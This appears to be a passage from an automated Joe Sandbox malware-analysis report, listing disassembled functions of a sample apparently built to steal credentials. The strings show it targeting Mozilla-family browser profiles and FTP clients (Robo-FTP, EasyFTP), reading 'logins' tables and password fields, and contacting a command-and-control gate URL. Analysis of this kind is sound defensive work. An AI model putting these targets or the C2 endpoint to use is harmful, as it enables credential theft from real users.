                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409EAF
                                                  • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                  • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                  • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                                                  • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409EF4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectory$CloseEnumOpen
                                                • String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
                                                • API String ID: 3062143572-164276155
                                                • Opcode ID: d71b08397f7855241f59228b2f7812fc7d16d5cd59468c82a62517f7b4ab111c
                                                • Instruction ID: 6c0ca7a26b87c7c70e6a01aab92075298d7fe0072118fde892d006f484df090e
                                                • Opcode Fuzzy Hash: d71b08397f7855241f59228b2f7812fc7d16d5cd59468c82a62517f7b4ab111c
                                                • Instruction Fuzzy Hash: CBF01270680208BADF10AB51CD43FCD7B669B14748F1180667704751E3D7B9DAD19A48
                                                Function 00409F08 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409F36
                                                  • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                  • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                  • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                                                  • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409F7B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectory$CloseEnumOpen
                                                • String ID: Flock$Software\Mozilla$\Flock\Browser\
                                                • API String ID: 3062143572-1276807325
                                                • Opcode ID: 29296d0082a50089953f11c1f94118b563e7408bb88a0e5e02b1c8d3287188a8
                                                • Instruction ID: f5280ec9e0107380a21299960ef084744ae8c2892abc79ad58e4b51ce706d511
                                                • Opcode Fuzzy Hash: 29296d0082a50089953f11c1f94118b563e7408bb88a0e5e02b1c8d3287188a8
                                                • Instruction Fuzzy Hash: FCF01730680208BADF51AB61CC43FCD7AB5AB14749F218076BA48751E3DBB9DAD19A48
                                                Function 00409F8F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409FBD
                                                  • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                  • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                  • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                                                  • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040A002
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectory$CloseEnumOpen
                                                • String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
                                                • API String ID: 3062143572-2716603926
                                                • Opcode ID: 131c71901b6e6f8efd938cc30ab034825632f74977321a3e57dc4e4074c16a30
                                                • Instruction ID: ad10bed4d9095064944b6f1b39750bb114de016addf6147f224309e21cc9b741
                                                • Opcode Fuzzy Hash: 131c71901b6e6f8efd938cc30ab034825632f74977321a3e57dc4e4074c16a30
                                                • Instruction Fuzzy Hash: C2F03630680208BADF50BF51CC43FCD7A659B14745F1140667A08751E3DBF9DAD19B4C
                                                Function 0040A0A2 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 57COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,Odin), ref: 0040A0F4
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLocal
                                                • String ID: 8Ap$Odin$SiteInfo.QFP$XDp
                                                • API String ID: 2826327444-1406308668
                                                • Opcode ID: 30f2ad5037439782e851f0c47a1bf2b858e7b138a18d7a7ae1bf3ad4c08d3565
                                                • Instruction ID: cb19261180e9835e7d6e10c1a09fddbbd42b6fc3f6f61c88a0af093412c8222d
                                                • Opcode Fuzzy Hash: 30f2ad5037439782e851f0c47a1bf2b858e7b138a18d7a7ae1bf3ad4c08d3565
                                                • Instruction Fuzzy Hash: E501D670500205BAEB213B258C06FAF7E59DB82314F24413BBD10B51E3E67C8EA192ED
                                                Function 0040AED7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 0040AEED
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AF21
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040B009
                                                  • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACAA
                                                  • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACBD
                                                  • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACD0
                                                  • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACE3
                                                  • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACF6
                                                  • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040AD09
                                                  • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040AD1C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wsprintf$CloseEnumOpen
                                                • String ID: SiteServers
                                                • API String ID: 1693054222-2402683488
                                                • Opcode ID: a1f11ff4e54de8a2f1f41c19bf27dd541094ac564e6bd5b78484b3e2af1c4403
                                                • Instruction ID: a446ecacf4174ee40ccddb23f5ff2609404a5ff37a742fe041fe98d7ce509aa6
                                                • Opcode Fuzzy Hash: a1f11ff4e54de8a2f1f41c19bf27dd541094ac564e6bd5b78484b3e2af1c4403
                                                • Instruction Fuzzy Hash: C131287190021DEADF21AB51CD42BDEBAB9FF04304F04C0B6B154750A1DB795BA2AF9A
                                                Function 00408D1E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408D31
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408D65
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408E04
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: MRU
                                                • API String ID: 1332880857-344939820
                                                • Opcode ID: eed336e1a62e36d599677b71e4fa2249832b60eb19a1861c88a116fd1c8e9e9c
                                                • Instruction ID: 0962f506e68cdd8ccaa0ff695c2f519e513318d4d31b2a5f0dea04bfe0af0b42
                                                • Opcode Fuzzy Hash: eed336e1a62e36d599677b71e4fa2249832b60eb19a1861c88a116fd1c8e9e9c
                                                • Instruction Fuzzy Hash: 8821F331900108BADF11AB51CD42FDE7BBABF00304F1085BAB554B50E1DBB95B91AF98
                                                Function 00401C8D Relevance: 6.1, APIs: 4, Instructions: 87registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401CD2
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401CED
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401D23
                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401D45
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: QueryValue$CloseOpen
                                                • String ID:
                                                • API String ID: 1586453840-0
                                                • Opcode ID: 56cdd0336bac98b00ff7424e586f2218e00cec739b08c9fb7428d64b0c3150db
                                                • Instruction ID: f684edda37e69a729a9dfe3678b60f116084d598a8b6b39bf51dbd963b68634d
                                                • Opcode Fuzzy Hash: 56cdd0336bac98b00ff7424e586f2218e00cec739b08c9fb7428d64b0c3150db
                                                • Instruction Fuzzy Hash: 36213C31A00109BBEF229E60CD81BAE3BBAEF41344F144076F910A61E0D678EA95DB59
                                                Function 0040BE0B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 85stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrcmpiA.KERNEL32(00000000,logins), ref: 0040BE49
                                                • lstrcmp.KERNEL32(table,?), ref: 0040BE7E
                                                  • Part of subcall function 0040BAF7: StrStrIA.SHLWAPI(?,() ), ref: 0040BB07
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcmplstrcmpi
                                                • String ID: logins$table
                                                • API String ID: 3524194181-3800951466
                                                • Opcode ID: 148570ffec1f25e65078e6191b76618e9bbeb353fec0d617c32987c936426af4
                                                • Instruction ID: 4e1aa7e609f9c63133400eaf0fbab0bfe716398796ba7bb72f53a7a8be838654
                                                • Opcode Fuzzy Hash: 148570ffec1f25e65078e6191b76618e9bbeb353fec0d617c32987c936426af4
                                                • Instruction Fuzzy Hash: FB31E97581020EFACF21DF94CC469EEBB79EB04328F204276A121B61E0D7759A54DF9C
                                                Function 00406FBB Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: "password" : "
                                                • API String ID: 0-2310853927
                                                • Opcode ID: 7c37d07824f4c03073b15de7acf479df2d6c38a7f9396e9c9341b5741b44def0
                                                • Instruction ID: bee61a90249f81009c8457dd16d7b53d7f9fc3dd6c708c4ffa186b800f2db450
                                                • Opcode Fuzzy Hash: 7c37d07824f4c03073b15de7acf479df2d6c38a7f9396e9c9341b5741b44def0
                                                • Instruction Fuzzy Hash: 2C21CF71C08109FECF11BBA18C029EE7E66AF41358F204137F400B51A1E3794B91A7AA
                                                Function 0040D2CB Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                • wsprintfA.USER32 ref: 0040D315
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLocalwsprintf
                                                • String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
                                                • API String ID: 988369812-376751567
                                                • Opcode ID: 0fa57847abe90e886d72a0776039240488e35965e57a2dbfa00e81f40d4b0655
                                                • Instruction ID: 199b26d5468ed6bde52246b1b6ef23e8a9f49e1214d4f7d1b5726db887637ddc
                                                • Opcode Fuzzy Hash: 0fa57847abe90e886d72a0776039240488e35965e57a2dbfa00e81f40d4b0655
                                                • Instruction Fuzzy Hash: 62015E71D40109FAEF00BAD0CC82EEE7B79AB00718F508476F910B11D1D7BD9B98DA6A
                                                Function 00401226 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000), ref: 00401236
                                                • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 0040125A
                                                • CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 00401266
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseExitFileHandleProcessRead
                                                • String ID:
                                                • API String ID: 1390701169-0
                                                • Opcode ID: 01f3c162f4711ba5c2a48e9f8477b930ae4739685a5279cda6f8647624262369
                                                • Instruction ID: 77f65db424b8dbfecb4d9d0992eed673c7479144c9e59104ccc0ab534344ee26
                                                • Opcode Fuzzy Hash: 01f3c162f4711ba5c2a48e9f8477b930ae4739685a5279cda6f8647624262369
                                                • Instruction Fuzzy Hash: D6F0FF31940108BADF21AB50CC42FDD7A78AB64349F1080A6B544F50E0D6B99BE49B54
                                                Function 0040FD78 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00403FFB: WSAStartup.WSOCK32(00000101,?), ref: 00404010
                                                • Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 0040FE34
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: SleepStartup
                                                • String ID: Client Hash$http://admino.ml/eme/gate.php
                                                • API String ID: 1372284471-2973176254
                                                • Opcode ID: e69adfeacc646c749e3397c72f43b649a6311c0477a2a9a1815bea49add016bb
                                                • Instruction ID: 534881ec054deb94b57e270d36c90eed6f3ef705066acc8506ca45b4f3c416af
                                                • Opcode Fuzzy Hash: e69adfeacc646c749e3397c72f43b649a6311c0477a2a9a1815bea49add016bb
                                                • Instruction Fuzzy Hash: B9210171D0024A9ADF31EAE1C9467FF7A74AB40349F10003BE241715E2D7BC4D99DBAA
                                                Function 004075D2 Relevance: 4.6, APIs: 3, Instructions: 51registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004075E5
                                                • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407619
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040767C
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpenValue
                                                • String ID:
                                                • API String ID: 4012628704-0
                                                • Opcode ID: 10ea3502066fe8b52e55fe2e13767115a87fa09241fe0bdf3a2df35634072dad
                                                • Instruction ID: 85ca958a1271cad8174414d3164074e3ff60ec8eec34d7e66a6ef738b10b5b92
                                                • Opcode Fuzzy Hash: 10ea3502066fe8b52e55fe2e13767115a87fa09241fe0bdf3a2df35634072dad
                                                • Instruction Fuzzy Hash: 44113D3180010DBADF119F90CC41FDEBBB9BF04304F1085B6B515B01A0DB796B919F99
                                                Function 00403800 Relevance: 4.6, APIs: 3, Instructions: 50networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WSOCK32(00000002,00000001,00000006), ref: 0040380F
                                                • connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 0040386B
                                                • closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 00403876
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: closesocketconnectsocket
                                                • String ID:
                                                • API String ID: 643388700-0
                                                • Opcode ID: 66ed0b44e1bf70d42faca8f8d91c58e31e1fadf103d0eb03bfab5dc24b0d5bd7
                                                • Instruction ID: 08d913eedad497c84f2e0313ceade0e14c6413b499fa458ef27ae104aaf27b56
                                                • Opcode Fuzzy Hash: 66ed0b44e1bf70d42faca8f8d91c58e31e1fadf103d0eb03bfab5dc24b0d5bd7
                                                • Instruction Fuzzy Hash: 39018832904208AADB10BE758C85BEE769CAF00325F10CA7BB524651D1D7BCCB84D61A
                                                Function 0040F3AC Relevance: 4.6, APIs: 3, Instructions: 50registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F3BF
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F3F3
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F44D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID:
                                                • API String ID: 1332880857-0
                                                • Opcode ID: ec7afe98fa9306c68e0e113f5d8e937e7a40e9961f8d5e97dd4b07cee669d47f
                                                • Instruction ID: 25757aefe436132530bd79105f2911b35f687820d7f807c11c3c7734766150bd
                                                • Opcode Fuzzy Hash: ec7afe98fa9306c68e0e113f5d8e937e7a40e9961f8d5e97dd4b07cee669d47f
                                                • Instruction Fuzzy Hash: 5D112A3590010DBADF11AF91CC42FDE7BB9BF00704F1080B6B914B51E1DBB9AA94AF99
                                                Function 0040F30D Relevance: 4.5, APIs: 3, Instructions: 48registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F320
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F350
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F3A3
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID:
                                                • API String ID: 1332880857-0
                                                • Opcode ID: 863b2a7bf1469ebeca4f76d56d3a89dd2cc34a1a9cf62110b3f9b2635596bc69
                                                • Instruction ID: 45928e3938db904d05e16263eed0eecc5d6e07d10bcb7dd287d335a9eaebcbfe
                                                • Opcode Fuzzy Hash: 863b2a7bf1469ebeca4f76d56d3a89dd2cc34a1a9cf62110b3f9b2635596bc69
                                                • Instruction Fuzzy Hash: C6113C31900108BADF11AF91CC02FEE7BB9BF00704F1081B6B914B51E1DBB96A94AF98
                                                Function 0040CB74 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(?,EasyFTP), ref: 0040CBAB
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                • SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040CB8D
                                                • EasyFTP, xrefs: 0040CBA3
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
                                                • API String ID: 1884169789-2776585315
                                                • Opcode ID: 9f2afe7237929f859a56fa488468728360c5d6e741fae9cd32d000a34098b0dc
                                                • Instruction ID: 012631f08c3f720db82d748fc1356d0498b941b070556770c17d11d6cf9e9cf7
                                                • Opcode Fuzzy Hash: 9f2afe7237929f859a56fa488468728360c5d6e741fae9cd32d000a34098b0dc
